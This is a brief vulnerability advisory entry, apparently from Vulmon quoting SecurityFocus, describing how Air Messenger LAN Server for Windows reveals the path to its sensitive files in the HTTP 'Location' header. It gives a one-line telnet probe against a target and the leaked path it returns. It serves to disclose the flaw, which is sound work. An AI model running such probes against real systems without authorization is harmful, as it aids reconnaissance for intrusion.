Vulmon
source: http://www.securityfocus.com/bid/2881/info
Air Messenger LAN Server for Microsoft Windows allows users to exchange phone, pager and email messages through a Web gateway.
The path to sensitive files used by AMLServer can be easily obtained by any remote user, simply by examining the webserver's http-header 'Location' field.
$ telnet target 80|grep Location
Location: http://C:\PROGRA~1\ISS\AIRMES~1\Messages
Connection closed by foreign host.